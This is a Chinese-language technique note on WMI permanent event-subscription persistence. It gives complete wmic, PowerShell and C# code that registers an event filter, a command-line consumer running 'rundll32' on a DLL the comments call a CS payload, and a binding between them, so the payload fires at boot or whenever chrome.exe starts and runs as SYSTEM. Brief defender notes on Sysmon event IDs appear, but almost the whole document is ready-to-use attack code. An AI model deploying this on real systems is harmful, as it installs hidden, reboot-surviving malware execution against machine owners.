WMI事件
WMI事件是特定对象的属性发生改变时发出的通知，包括增加、修改、删除三种类型。可以使用 wmic 命令来创建和修改这类事件订阅。
利用代码
命令行:
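# Register an event filter that fires once the host has been up for 2 to 2.5 minutes.
# This is a permanent WMI event subscription, so creating it requires administrator
# rights; the command the bound consumer runs is executed by the WMI provider host as SYSTEM.
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="TestEventFilter", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 20 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >=120 AND TargetInstance.SystemUpTime < 150"
# Register an event consumer holding the command to run: rundll32 loading the CS DLL.
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="TestConsumer2",ExecutablePath="C:\Windows\System32\cmd.exe",CommandLineTemplate=" /c rundll32 c:\Temp\qwqdanchun.dll"
# Bind the event filter to the event consumer; neither object does anything until bound.
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"TestEventFilter\"", Consumer="CommandLineEventConsumer.Name=\"TestConsumer2\""
# Defender note: all three objects stay in root\subscription across reboots and can be listed with
# Get-WmiObject -Namespace root\subscription -Class __EventFilter (likewise CommandLineEventConsumer
# and __FilterToConsumerBinding); Sysmon Event IDs 19/20/21 and WMI-Activity/Operational event 5861
# record their creation.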
PowerShell:
# Permanent WMI event subscription built from three objects in root\subscription.
# Creating them requires administrative rights. All three remain in the WMI repository
# across reboots and are visible to defenders via Get-WmiObject on root\subscription
# and Sysmon Event IDs 19/20/21.
$namespace = 'root\subscription'

# 1. Event filter: fires within 5 seconds of a new process named chrome.exe being created.
$filterArgs = @{
    Name           = 'BugSecFilter'
    EventNamespace = 'root\CIMV2'
    QueryLanguage  = 'WQL'
    Query          = "select * from __InstanceCreationEvent within 5 where targetInstance isa 'Win32_Process' and TargetInstance.Name = 'chrome.exe'"
}
$filter = Set-WmiInstance -Namespace $namespace -Class '__EventFilter' -Arguments $filterArgs

# 2. Command-line consumer: the command WMI runs each time the filter fires.
$consumerArgs = @{
    Name                = 'BugSecConsumer'
    CommandLineTemplate = "cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll"
}
$consumer = Set-WmiInstance -Namespace $namespace -Class 'CommandLineEventConsumer' -Arguments $consumerArgs

# 3. Binding: joins the filter to the consumer; the created binding is emitted to the pipeline.
Set-WmiInstance -Namespace $namespace -Class '__FilterToConsumerBinding' -Arguments @{
    Filter   = $filter
    Consumer = $consumer
}
C#:
using System;
using System.Text;
using System.Management;
namespace WMIPersistence
{
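class Program
{
    /// <summary>
    /// Entry point. Installs the permanent WMI event subscription and then waits for a key
    /// press so the console stays open long enough to read any error output.
    /// </summary>
    /// <param name="args">Unused.</param>
    static void Main(string[] args)
    {
        PersistWMI();
    }

    /// <summary>
    /// Writes the three objects that make up a permanent WMI event subscription to the
    /// root\subscription namespace: an <c>__EventFilter</c> that fires on creation of a
    /// process named chrome.exe, a <c>CommandLineEventConsumer</c> holding the command to
    /// run, and the <c>__FilterToConsumerBinding</c> that joins them. Writing to
    /// root\subscription requires administrative rights. Each <see cref="ManagementObject"/>
    /// and <see cref="ManagementClass"/> is disposed once its <c>Put()</c> has completed; the
    /// stored objects themselves remain in the repository until removed, and their creation
    /// is recorded by Sysmon Event IDs 19/20/21 where Sysmon is deployed.
    /// Any exception raised by the WMI provider is written to the console and not rethrown.
    /// </summary>
    static void PersistWMI()
    {
        string commandLine = @"cmd.exe /c rundll32 c:\Temp\qwqdanchun.dll";
        string strQuery = @"SELECT * FROM __InstanceCreationEvent WITHIN 5 " +
            "WHERE TargetInstance ISA \"Win32_Process\" " +
            "AND TargetInstance.Name = \"chrome.exe\"";
        try
        {
            ManagementScope scope = new ManagementScope(@"\\.\root\subscription");
            // Relative paths of the stored filter and consumer; the binding refers to them by path.
            string filterPath;
            string consumerPath;

            // 1. Event filter. WqlEventQuery parses the WQL text; its QueryString and
            //    QueryLanguage are what get stored on the filter instance.
            using (ManagementClass filterClass = new ManagementClass(scope, new ManagementPath("__EventFilter"), null))
            using (ManagementObject eventFilter = filterClass.CreateInstance())
            {
                WqlEventQuery eventQuery = new WqlEventQuery(strQuery);
                eventFilter["Name"] = "BugSecFilter";
                eventFilter["Query"] = eventQuery.QueryString;
                eventFilter["QueryLanguage"] = eventQuery.QueryLanguage;
                eventFilter["EventNameSpace"] = @"\root\cimv2";
                eventFilter.Put();
                // Read the path after Put() and before the object is disposed.
                filterPath = eventFilter.Path.RelativePath;
            }

            // 2. Command-line consumer: the command WMI runs each time the filter fires.
            using (ManagementClass consumerClass = new ManagementClass(scope, new ManagementPath("CommandLineEventConsumer"), null))
            using (ManagementObject consumer = consumerClass.CreateInstance())
            {
                consumer["Name"] = "BugSecConsumer";
                consumer["CommandLineTemplate"] = commandLine;
                consumer.Put();
                consumerPath = consumer.Path.RelativePath;
            }

            // 3. Binding that joins filter and consumer; neither does anything until bound.
            using (ManagementClass bindingClass = new ManagementClass(scope, new ManagementPath("__FilterToConsumerBinding"), null))
            using (ManagementObject binding = bindingClass.CreateInstance())
            {
                binding["Filter"] = filterPath;
                binding["Consumer"] = consumerPath;
                binding.Put();
            }
        }
        catch (Exception e)
        {
            // Provider errors are reported to the console, not rethrown.
            Console.WriteLine(e);
        }
        Console.ReadKey();
    }
}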
}
参考文章: